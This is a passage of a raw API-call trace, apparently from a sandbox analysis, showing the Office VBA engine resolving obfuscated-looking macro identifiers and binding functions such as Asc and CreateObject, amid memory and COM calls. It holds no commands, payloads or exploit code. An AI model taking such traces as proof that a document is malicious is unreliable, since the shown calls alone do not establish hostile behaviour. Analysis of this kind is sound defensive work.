[0045.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x81f7284, cbMultiByte=1, lpWideCharStr=0x3b002c4, cchWideChar=4 | out: lpWideCharStr="V") returned 1 [0045.640] ITypeComp:RemoteBind (in: This=0x7edf750, szName="jbl__91", lHashVal=0x10dee6, wFlags=0x5, ppTInfo=0x2047a8, pDescKind=0x2047bc, ppFuncDesc=0x2047c0, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2047a8*=0x0, pDescKind=0x2047bc*=0, ppFuncDesc=0x2047c0, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2ee2, cbMultiByte=8, lpWideCharStr=0x2047f0, cchWideChar=9 | out: lpWideCharStr="jbl__91") returned 8 [0045.640] ITypeComp:RemoteBind (in: This=0x3dd7b90, szName="jbl__91", lHashVal=0x10dee6, wFlags=0x5, ppTInfo=0x2047a8, pDescKind=0x2047bc, ppFuncDesc=0x2047c0, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2047a8*=0x0, pDescKind=0x2047bc*=0, ppFuncDesc=0x2047c0, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2ee2, cbMultiByte=8, lpWideCharStr=0x2047f0, cchWideChar=9 | out: lpWideCharStr="jbl__91") returned 8 [0045.641] ITypeComp:RemoteBind (in: This=0x7ee0560, szName="jbl__91", lHashVal=0x10dee6, wFlags=0x5, ppTInfo=0x2047a8, pDescKind=0x2047bc, ppFuncDesc=0x2047c0, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2047a8*=0x0, pDescKind=0x2047bc*=0, ppFuncDesc=0x2047c0, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jbl__91") returned 0x10dee6 [0045.641] strcpy_s (in: _Dst=0x204750, _DstSize=0x8, _Src="jbl__91" | out: _Dst="jbl__91") returned 0x0 [0045.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x204750, cbMultiByte=8, lpWideCharStr=0x2045a0, cchWideChar=8 | out: lpWideCharStr="jbl__91") returned 8 [0045.641] IUnknown:AddRef (This=0x7edf740) returned 0x8 [0045.641] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="jbl__91", lHashVal=0x10dee6, pfName=0x204670, pBstrLibName=0x2045a0 | out: pfName=0x204670*=0, pBstrLibName=0x2045a0) returned 0x0 [0045.641] IUnknown:Release (This=0x7edf740) returned 0x7 [0045.641] IUnknown:AddRef (This=0x3dd7b80) returned 0x14 [0045.641] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="jbl__91", lHashVal=0x10dee6, pfName=0x204670, pBstrLibName=0x2045a0 | out: pfName=0x204670*=0, pBstrLibName=0x2045a0) returned 0x0 [0045.641] IUnknown:Release (This=0x3dd7b80) returned 0x13 [0045.641] IUnknown:AddRef (This=0x7ee0550) returned 0x9 [0045.641] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="jbl__91", lHashVal=0x10dee6, pfName=0x204670, pBstrLibName=0x2045a0 | out: pfName=0x204670*=0, pBstrLibName=0x2045a0) returned 0x0 [0045.641] IUnknown:Release (This=0x7ee0550) returned 0x8 [0045.641] IUnknown:AddRef (This=0x7edffb0) returned 0x7 [0045.641] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="jbl__91", lHashVal=0x10dee6, pfName=0x204670, pBstrLibName=0x2045a0 | out: pfName=0x204670*=0, pBstrLibName=0x2045a0) returned 0x0 [0045.641] IUnknown:Release (This=0x7edffb0) returned 0x6 [0045.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2ee2, cbMultiByte=8, lpWideCharStr=0x2047f0, cchWideChar=9 | out: lpWideCharStr="jbl__91") returned 8 [0045.641] ITypeComp:RemoteBind (in: This=0x7edffc0, szName="jbl__91", lHashVal=0x10dee6, wFlags=0x5, ppTInfo=0x2047a8, pDescKind=0x2047bc, ppFuncDesc=0x2047c0, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2047a8*=0x0, pDescKind=0x2047bc*=0, ppFuncDesc=0x2047c0, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.641] IMalloc:Alloc (This=0x7feff045380, cb=0xf) returned 0x817bcd0 [0045.641] _mbscpy_s (in: _Dst=0x817bcd0, _DstSizeInBytes=0x8, _Src=0x30d2ee2 | out: _Dst=0x817bcd0) returned 0x0 [0045.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jbl__91") returned 0x10e26a [0045.641] strcpy_s (in: _Dst=0x204900, _DstSize=0xf, _Src="_B_var_jbl__91" | out: _Dst="_B_var_jbl__91") returned 0x0 [0045.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x204900, cbMultiByte=15, lpWideCharStr=0x204750, cchWideChar=15 | out: lpWideCharStr="_B_var_jbl__91") returned 15 [0045.641] IUnknown:AddRef (This=0x7edf740) returned 0x8 [0045.641] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="_B_var_jbl__91", lHashVal=0x10e26a, pfName=0x204820, pBstrLibName=0x204750 | out: pfName=0x204820*=0, pBstrLibName=0x204750) returned 0x0 [0045.642] IUnknown:Release (This=0x7edf740) returned 0x7 [0045.642] IUnknown:AddRef (This=0x3dd7b80) returned 0x14 [0045.642] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="_B_var_jbl__91", lHashVal=0x10e26a, pfName=0x204820, pBstrLibName=0x204750 | out: pfName=0x204820*=0, pBstrLibName=0x204750) returned 0x0 [0045.642] IUnknown:Release (This=0x3dd7b80) returned 0x13 [0045.642] IUnknown:AddRef (This=0x7ee0550) returned 0x9 [0045.642] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="_B_var_jbl__91", lHashVal=0x10e26a, pfName=0x204820, pBstrLibName=0x204750 | out: pfName=0x204820*=0, pBstrLibName=0x204750) returned 0x0 [0045.642] IUnknown:Release (This=0x7ee0550) returned 0x8 [0045.642] IUnknown:AddRef (This=0x7edffb0) returned 0x7 [0045.642] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="_B_var_jbl__91", lHashVal=0x10e26a, pfName=0x204820, pBstrLibName=0x204750 | out: pfName=0x204820*=0, pBstrLibName=0x204750) returned 0x0 [0045.642] IUnknown:Release (This=0x7edffb0) returned 0x6 [0045.642] IUnknown:AddRef (This=0x7edf740) returned 0x8 [0045.642] IUnknown:Release (This=0x7edf740) returned 0x7 [0045.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0482, cbMultiByte=15, lpWideCharStr=0x2047b0, cchWideChar=16 | out: lpWideCharStr="_B_var_jbl__91") returned 15 [0045.642] ITypeComp:RemoteBind (in: This=0x7edf750, szName="_B_var_jbl__91", lHashVal=0x10e26a, wFlags=0x5, ppTInfo=0x204768, pDescKind=0x20477c, ppFuncDesc=0x204780, ppVarDesc=0x6a005f00720061, ppTypeComp=0x5f005f00000000, pDummy=0x0 | out: ppTInfo=0x204768*=0x0, pDescKind=0x20477c*=0, ppFuncDesc=0x204780, ppVarDesc=0x6a005f00720061, ppTypeComp=0x5f005f00000000, pDummy=0x0) returned 0x0 [0045.642] _mbscpy_s (in: _Dst=0x204970, _DstSizeInBytes=0x8, _Src=0x30d2ee2 | out: _Dst=0x204970) returned 0x0 [0045.642] IMalloc:Free (This=0x7feff045380, pv=0x817bcd0) [0045.642] IMalloc:Realloc (This=0x7feff045380, pv=0x7ba4c60, cb=0xb0) returned 0x81e43e0 [0045.642] IMalloc:Free (This=0x7feff045380, pv=0x7f186d0) [0045.642] GetCurrentProcess () returned 0xffffffffffffffff [0045.642] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9c28, dwSize=0x8) returned 1 [0045.642] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d94e8, dwSize=0x8) returned 1 [0045.642] GetCurrentProcess () returned 0xffffffffffffffff [0045.642] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d95a0, dwSize=0x8) returned 1 [0045.642] GetCurrentProcess () returned 0xffffffffffffffff [0045.642] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9b68, dwSize=0x8) returned 1 [0045.642] GetCurrentProcess () returned 0xffffffffffffffff [0045.642] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9c28, dwSize=0x8) returned 1 [0045.642] GetCurrentProcess () returned 0xffffffffffffffff [0045.642] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9ce8, dwSize=0x8) returned 1 [0045.642] GetCurrentProcess () returned 0xffffffffffffffff [0045.643] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813aee8, dwSize=0x8) returned 1 [0045.643] GetCurrentProcess () returned 0xffffffffffffffff [0045.643] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813afb0, dwSize=0x8) returned 1 [0045.643] GetCurrentProcess () returned 0xffffffffffffffff [0045.643] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b148, dwSize=0x8) returned 1 [0045.643] GetCurrentProcess () returned 0xffffffffffffffff [0045.643] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b218, dwSize=0x8) returned 1 [0045.643] GetCurrentProcess () returned 0xffffffffffffffff [0045.643] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b390, dwSize=0x8) returned 1 [0045.643] GetCurrentProcess () returned 0xffffffffffffffff [0045.643] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b458, dwSize=0x8) returned 1 [0045.643] IUnknown:AddRef (This=0x7f72500) returned 0x3 [0045.643] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205d88 | out: ppvObject=0x205d88*=0x0) returned 0x80004002 [0045.643] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205d80 | out: ppvObject=0x205d80*=0x0) returned 0x80004002 [0045.643] IUnknown:Release (This=0x7f72500) returned 0x2 [0045.643] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba4c60 [0045.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f00ae, cbMultiByte=4, lpWideCharStr=0x204690, cchWideChar=5 | out: lpWideCharStr="Asc") returned 4 [0045.643] ITypeComp:RemoteBind (in: This=0x7edf750, szName="Asc", lHashVal=0x107521, wFlags=0x3, ppTInfo=0x204648, pDescKind=0x20465c, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204648*=0x8128768, pDescKind=0x20465c*=1, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.644] ITypeInfo:RemoteGetTypeAttr (in: This=0x8128768, ppTypeAttr=0x204650, pDummy=0x1 | out: ppTypeAttr=0x204650, pDummy=0x1) returned 0x0 [0045.644] ITypeInfo:LocalReleaseTypeAttr (This=0x8128768) returned 0x0 [0045.644] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2044b0 | out: ppvObject=0x2044b0*=0x8128768) returned 0x0 [0045.644] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x8128768, memid=1610612736, invkind=1, pFuncIndex=0x2044f0 | out: pFuncIndex=0x2044f0*=0x0) returned 0x0 [0045.644] ITypeInfo2:GetFuncCustData (in: This=0x8128768, index=0x0, GUID=0x7fee4043758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x204508 | out: pVarVal=0x204508*(varType=0x0, wReserved1=0x20, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x107521)) returned 0x0 [0045.644] IUnknown:Release (This=0x8128768) returned 0x1 [0045.644] IUnknown:AddRef (This=0x8128768) returned 0x2 [0045.644] ITypeInfo:LocalReleaseFuncDesc (This=0x8128768) returned 0x0 [0045.644] IUnknown:Release (This=0x8128768) returned 0x1 [0045.644] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204778 | out: ppvObject=0x204778*=0x0) returned 0x80004002 [0045.644] IUnknown:AddRef (This=0x8128768) returned 0x2 [0045.644] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204700 | out: ppvObject=0x204700*=0x0) returned 0x80004002 [0045.644] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2046d0 | out: ppvObject=0x2046d0*=0x0) returned 0x80004002 [0045.644] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2046c0 | out: ppvObject=0x2046c0*=0x0) returned 0x80004002 [0045.644] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2046c8 | out: ppvObject=0x2046c8*=0x0) returned 0x80004002 [0045.644] ITypeInfo:RemoteGetTypeAttr (in: This=0x8128768, ppTypeAttr=0x2046f8, pDummy=0x10 | out: ppTypeAttr=0x2046f8, pDummy=0x10) returned 0x0 [0045.644] ITypeInfo:LocalReleaseTypeAttr (This=0x8128768) returned 0x0 [0045.644] IUnknown:AddRef (This=0x8128768) returned 0x3 [0045.644] IUnknown:Release (This=0x8128768) returned 0x2 [0045.644] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e8 | out: ppvObject=0x2048e8*=0x0) returned 0x80004002 [0045.645] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e0 | out: ppvObject=0x2048e0*=0x0) returned 0x80004002 [0045.645] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x204120, pIndex=0x0 | out: ppTLib=0x204120*=0x7edf740, pIndex=0x0) returned 0x0 [0045.645] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x204130, pDummy=0x0 | out: ppTLibAttr=0x204130, pDummy=0x0) returned 0x0 [0045.645] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0045.645] IUnknown:Release (This=0x7edf740) returned 0x9 [0045.645] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x204120, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0045.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0045.645] strcpy_s (in: _Dst=0x81d9178, _DstSize=0x9, _Src="VBE7.DLL" | out: _Dst="VBE7.DLL") returned 0x0 [0045.645] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x204120, pbstrName=0x0, pwOrdinal=0x204140 | out: pBstrDllName=0x204120*=0x0, pbstrName=0x0, pwOrdinal=0x204140*=0x43b0) returned 0x0 [0045.645] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x204120, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x204120, pwOrdinal=0x500000000) returned 0x0 [0045.645] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x81f8ec0 [0045.646] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x813b770 [0045.646] IMalloc:Realloc (This=0x7feff045380, pv=0x8119c50, cb=0x100) returned 0x810a1a0 [0045.646] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x814d240 [0045.646] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0045.646] GetCurrentProcess () returned 0xffffffffffffffff [0045.646] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x814d240, dwSize=0x3b) returned 1 [0045.646] IMalloc:Free (This=0x7feff045380, pv=0x814d240) [0045.646] ITypeComp:RemoteBind (in: This=0x7edf750, szName="CreateObject", lHashVal=0x108af8, wFlags=0x3, ppTInfo=0x204648, pDescKind=0x20465c, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204648*=0x81287c0, pDescKind=0x20465c*=1, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.647] ITypeInfo:RemoteGetTypeAttr (in: This=0x81287c0, ppTypeAttr=0x204650, pDummy=0x1 | out: ppTypeAttr=0x204650, pDummy=0x1) returned 0x0 [0045.647] ITypeInfo:LocalReleaseTypeAttr (This=0x81287c0) returned 0x0 [0045.647] IMalloc:Realloc (This=0x7feff045380, pv=0x811c950, cb=0x100) returned 0x810a4d0 [0045.647] IMalloc:Realloc (This=0x7feff045380, pv=0x810a4d0, cb=0x200) returned 0x8061d00 [0045.647] SysStringByteLen (bstr="") returned 0x0 [0045.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x2043c0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" E ", lpUsedDefaultChar=0x0) returned 0 [0045.647] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2043f0 | out: ppvObject=0x2043f0*=0x81287c0) returned 0x0 [0045.647] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x81287c0, memid=1610612738, invkind=1, pFuncIndex=0x2043e8 | out: pFuncIndex=0x2043e8*=0x2) returned 0x0 [0045.647] ITypeInfo2:GetParamCustData (in: This=0x81287c0, indexFunc=0x2, indexParam=0x1, GUID=0x7fee4044e80*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x2043f8 | out: pVarVal=0x2043f8*(varType=0x0, wReserved1=0x806, wReserved2=0x0, wReserved3=0x0, varVal1=0x81f2a40, varVal2=0x205108)) returned 0x0 [0045.647] IUnknown:Release (This=0x81287c0) returned 0x1 [0045.647] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2044b0 | out: ppvObject=0x2044b0*=0x81287c0) returned 0x0 [0045.647] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x81287c0, memid=1610612738, invkind=1, pFuncIndex=0x2044f0 | out: pFuncIndex=0x2044f0*=0x2) returned 0x0 [0045.647] ITypeInfo2:GetFuncCustData (in: This=0x81287c0, index=0x2, GUID=0x7fee4043758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x204508 | out: pVarVal=0x204508*(varType=0x0, wReserved1=0x20, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x108af8)) returned 0x0 [0045.647] IUnknown:Release (This=0x81287c0) returned 0x1 [0045.647] IUnknown:AddRef (This=0x81287c0) returned 0x2 [0045.647] ITypeInfo:LocalReleaseFuncDesc (This=0x81287c0) returned 0x0 [0045.647] IUnknown:Release (This=0x81287c0) returned 0x1 [0045.647] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204778 | out: ppvObject=0x204778*=0x0) returned 0x80004002 [0045.647] IUnknown:AddRef (This=0x81287c0) returned 0x2 [0045.647] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204700 | out: ppvObject=0x204700*=0x0) returned 0x80004002 [0045.647] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2046d0 | out: ppvObject=0x2046d0*=0x0) returned 0x80004002 [0045.647] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2046c0 | out: ppvObject=0x2046c0*=0x0) returned 0x80004002 [0045.647] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2046c8 | out: ppvObject=0x2046c8*=0x0) returned 0x80004002 [0045.647] ITypeInfo:RemoteGetTypeAttr (in: This=0x81287c0, ppTypeAttr=0x2046f8, pDummy=0x10 | out: ppTypeAttr=0x2046f8, pDummy=0x10) returned 0x0 [0045.647] ITypeInfo:LocalReleaseTypeAttr (This=0x81287c0) returned 0x0 [0045.647] IUnknown:AddRef (This=0x81287c0) returned 0x3 [0045.648] IUnknown:Release (This=0x81287c0) returned 0x2 [0045.648] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e8 | out: ppvObject=0x2048e8*=0x0) returned 0x80004002 [0045.648] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e0 | out: ppvObject=0x2048e0*=0x0) returned 0x80004002 [0045.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8061e1c, cbMultiByte=0, lpWideCharStr=0x3b007f4, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0045.648] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x81287c0, ppTLib=0x204120, pIndex=0x0 | out: ppTLib=0x204120*=0x7edf740, pIndex=0x0) returned 0x0 [0045.648] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x204130, pDummy=0x0 | out: ppTLibAttr=0x204130, pDummy=0x0) returned 0x0 [0045.648] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0045.648] IUnknown:Release (This=0x7edf740) returned 0xb [0045.648] ITypeInfo:RemoteGetDllEntry (in: This=0x81287c0, memid=1610612738, invkind=1, refPtrFlags=0x204120, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0045.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0045.648] ITypeInfo:RemoteGetDllEntry (in: This=0x81287c0, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x204120, pbstrName=0x0, pwOrdinal=0x204140 | out: pBstrDllName=0x204120*=0x0, pbstrName=0x0, pwOrdinal=0x204140*=0x43b0) returned 0x0 [0045.648] ITypeInfo:RemoteGetDllEntry (in: This=0x81287c0, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x204120, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x204120, pwOrdinal=0x500000000) returned 0x0 [0045.648] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x814d240 [0045.648] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0045.648] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0045.648] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0045.648] GetCurrentProcess () returned 0xffffffffffffffff [0045.648] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x814d240, dwSize=0x4b) returned 1 [0045.648] IMalloc:Free (This=0x7feff045380, pv=0x814d240) [0045.648] IMalloc:Realloc (This=0x7feff045380, pv=0x3ea42f0, cb=0x800) returned 0x81f6280 [0045.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0362, cbMultiByte=4, lpWideCharStr=0x204690, cchWideChar=5 | out: lpWideCharStr="GMO") returned 4 [0045.648] ITypeComp:RemoteBind (in: This=0x7edf750, szName="GMO", lHashVal=0x109465, wFlags=0x8, ppTInfo=0x204648, pDescKind=0x20465c, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204648*=0x0, pDescKind=0x20465c*=0, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0362, cbMultiByte=4, lpWideCharStr=0x204690, cchWideChar=5 | out: lpWideCharStr="GMO") returned 4 [0045.648] 